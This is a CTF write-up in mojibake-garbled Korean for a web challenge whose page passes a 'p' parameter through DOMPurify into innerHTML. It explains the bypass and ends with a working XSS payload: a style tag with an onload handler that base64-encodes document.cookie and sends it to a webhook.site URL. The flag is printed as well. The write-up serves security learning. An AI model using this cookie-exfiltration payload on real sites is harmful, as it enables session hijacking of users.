Home
System Hacking
๐ŸŒฑ

๐ŸŒฑ

Type
CTF
๋…„๋„
2025
Name
Nowruz 1404
๋ถ„์•ผ
WEB
์„ธ๋ถ€๋ถ„์•ผ
XXS
์—ด
2025/03/20 05:36
1 more property

# Description

If nothing is removed, then it is surely safe. Hint: wait, why <script>1337</script> works??? App: https://mint-chall.fmc.tf/ Admin bot: https://mint-bot.fmc.tf/
Plain Text
๋ณต์‚ฌ

# ๋ถ„์„

# File

chall.html
ํ•ด๋‹น html ํŒŒ์ผ์„ ํ•˜๋‚˜ ์ค€๋‹ค.
DOMPurify๋ฅผ ๋จผ์ €๋ณด๋ฉด ์•„๋ž˜์˜ ๋งํฌ์—์„œ ์†Œ์Šค์ฝ”๋“œ๋ฅผ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.
DOMPurify
cure53
์ผ๋‹จ ๋ญ” library์ธ์ง€ ํ™•์ธํ•˜๋ฉด ์•„๋ž˜์™€ ๊ฐ™๋‹ค๊ณ  ๋งํ•ด์ค€๋‹ค.
DOMPurify๋Š” HTML์„ ์ •ํ™”ํ•˜๊ณ  XSS ๊ณต๊ฒฉ์„ ๋ฐฉ์ง€ํ•˜๋Š” ์—ญํ• ์„ ํ•ฉ๋‹ˆ๋‹ค. DOMPurify์— ์œ„ํ—˜ ์š”์†Œ๊ฐ€ ๊ฐ€๋“ํ•œ โ€œ๋”๋Ÿฌ์šดโ€ HTML ๋ฌธ์ž์—ด์„ ๋„˜๊ธฐ๋ฉด, ํŠน๋ณ„ํ•œ ์„ค์ •์ด ์—†๋Š” ํ•œ ์•ˆ์ „ํ•˜๊ฒŒ ์ •์ œ๋œ HTML ๋ฌธ์ž์—ด์„ ๋Œ๋ ค์ค๋‹ˆ๋‹ค. DOMPurify๋Š” ์œ„ํ—˜ํ•œ HTML์ด ํฌํ•จ๋œ ๋ชจ๋“  ์š”์†Œ๋ฅผ ์ œ๊ฑฐํ•ด XSS ๊ณต๊ฒฉ์„ ๋น„๋กฏํ•œ ์—ฌ๋Ÿฌ ์œ ํ•ด ์š”์†Œ๋ฅผ ๋ง‰์•„๋ƒ…๋‹ˆ๋‹ค. ๋˜ํ•œ ์ฒ˜๋ฆฌ ์†๋„๋„ ๋งค์šฐ ๋น ๋ฆ…๋‹ˆ๋‹ค. ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ์ œ๊ณตํ•˜๋Š” ๊ธฐ์ˆ ์„ ํ™œ์šฉํ•˜์—ฌ ์ด๋ฅผ XSS ํ•„ํ„ฐ๋กœ ๋งŒ๋“ค์–ด ์“ฐ๋ฉฐ, ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ๋น ๋ฅผ์ˆ˜๋ก DOMPurify ์—ญ์‹œ ๋” ๋นจ๋ฆฌ ๋™์ž‘ํ•ฉ๋‹ˆ๋‹ค.
์ผ๋‹จ ์†Œ์Šค ์ฝ”๋“œ๋ฅผ ๋จผ์ € ๋‹ค์šด๋กœ๋“œ ๋ฐ›์•„์„œ ๋ถ„์„์„ ์•ฝ๊ฐ„ ์ง„ํ–‰ํ•˜๊ธฐ ์œ„ํ•ด์„œ ์•„๋ž˜์˜ ์‚ฌ์ดํŠธ์—์„œ ๋™์ผํ•œ ๋ฒ„์ „์˜ DOMPurify๋ฅผ ๋‹ค์šด๋ฐ›์•„์ค€๋‹ค.
์†Œ์Šค ์ฝ”๋“œ์˜ ๋™์ž‘์„ ๋Œ€๋žต์ ์œผ๋กœ ์ดํ•ดํ•œ ๋’ค ๋‹ค์‹œ ๋ฌธ์ œ์—์„œ ์›ํ•˜๋Š” ์š”๊ตฌ ์‚ฌํ•ญ์„ ์ •๋ฆฌํ•˜๋ฉด ์•„๋ž˜์™€ ๊ฐ™๋‹ค.
1.
p๋กœ ๋“ค์–ด์˜จ GET Parameter๋ฅผ ๊ฐ€์ ธ์™€์„œ ๋์— โ€œโ€์„ ๋ถ™์—ฌ์ค€๋‹ค.
2.
DOMPurify.sanitize ํ•จ์ˆ˜ ์‹คํ–‰
3.
DOMPurify.removed.length ์ฆ‰ removed๊ฐ€ ๋œ ๊ฒƒ์ด ์—†์œผ๋ฉด xss.innerHTML์— p๋ฅผ ๋„ฃ๋Š”๋‹ค.

innerHTML Bypass

innerHTML์˜ ๊ฒฝ์šฐ ๊ฑฐ๊ธฐ์— ํฌํ•จ๋˜์–ด ์žˆ๋Š” <script></script>๋Š” ์‹คํ–‰๋˜์ง€ ์•Š๋Š”๋‹ค๊ณ  ์•„๋ž˜์˜ HTML Standard์—์„œ ์ •์˜๋˜์–ด์žˆ๋‹ค.
When inserted using theย document.write()ย method,ย scriptย elementsย usuallyย execute (typically blocking further script execution or HTML parsing). When inserted using theย innerHTMLย andย outerHTMLย attributes, they do not execute at all.
์ด๋ฅผ ์šฐํšŒํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” <img> ํƒœ๊ทธ์™€ ๋™์ผํ•˜๊ฒŒ src ์†์„ฑ์„ ์ด์šฉํ•ด์„œ ์™ธ๋ถ€๋กœ ๋ถ€ํ„ฐ ๋ฐ์ดํ„ฐ๋ฅผ ์š”์ฒญํ•˜๋Š” ํƒœ๊ทธ๋ฅผ ์ด์šฉํ•˜๋Š” ๊ฒƒ๋“ค์„ ์ฐพ์•„์„œ onerror, onload์™€ ๊ฐ™์€ ์†์„ฑ์„ ์ด์šฉํ•˜์—ฌ Bypass๊ฐ€ ๊ฐ€๋Šฅํ•˜๋‹ค.

DOMPurify.sanitize Bypass

<script> let p = ((new URLSearchParams(location.search)).get('p') ?? '')+`๐ŸŒฑ` DOMPurify.sanitize(p) if(!DOMPurify.removed.length) xss.innerHTML = p </script>
HTML
๋ณต์‚ฌ
์ฝ”๋“œ์˜ ํ•ต์‹ฌ์„ ๋ณด๋ฉด xss.innerHTML์— ๋„ฃ์–ด์ฃผ๋Š” ๊ฒƒ์€ ์šฐ๋ฆฌ๊ฐ€ ์ž…๋ ฅํ•œ p ๊ฐ’์„ ๋„ฃ์–ด์ค€๋‹ค.
๋‹ค์‹œ๋งํ•ด DOMPurify.sanitize(p)๋ฅผ ์ง„ํ–‰ํ•ด๋„ DOMPurify.removed.length์ด ๋˜๋Š” Tag๋ฅผ ์ฐพ๊ณ  ํ•ด๋‹น Tag์— onload attribute๋งŒ ์ง€์›ํ•˜๋Š”์ง€ ํ™•์ธํ•ด์„œ ํ•ด๋‹น Tag๋ฅผ ์ด์šฉํ•ด์„œ ๊ณต๊ฒฉ์„ ์ง„ํ–‰ํ•˜๋ฉด ๋œ๋‹ค.

DOMPurify.removed.length Bypass

DOMPurify ์†Œ์Šค ์ฝ”๋“œ๋ฅผ ๋ถ„์„ํ•˜๋ฉด ๋Œ€๋žต์ ์œผ๋กœ DOMPurify์—์„œ removed๋˜์ง€ ์•Š๋Š” ํƒœ๊ทธ๋ฅผ ์•Œ์•„๋‚ผ ์ˆ˜ ์žˆ๋‹ค.
๋Œ€ํ‘œ์ ์œผ๋กœ <script>, <style> ํƒœ๊ทธ๊ฐ€ ์กด์žฌํ•œ๋‹ค.
โ€ข
<script>
script ํƒœ๊ทธ์˜ ๊ฒฝ์šฐ onload์™€ ๊ฐ™์€ ์†์„ฑ์„ ์ง€์›ํ•˜์ง€ ์•Š๋Š”๋‹ค.
โ€ข
<style>
onload ์†์„ฑ์„ ์ง€์›ํ•œ๋‹ค.

# Payload

https://mint-chall.fmc.tf/?p=<style%20onload='location.href=`https://webhook.site/455194c0-8a95-453f-9240-a8498b46151c%3Fq%3D`%2Bbtoa(document.cookie)'></style>
HTML
๋ณต์‚ฌ

# Flag

FMCTF{a266b251865bb2627f945165a12598aa}
Plain Text
๋ณต์‚ฌ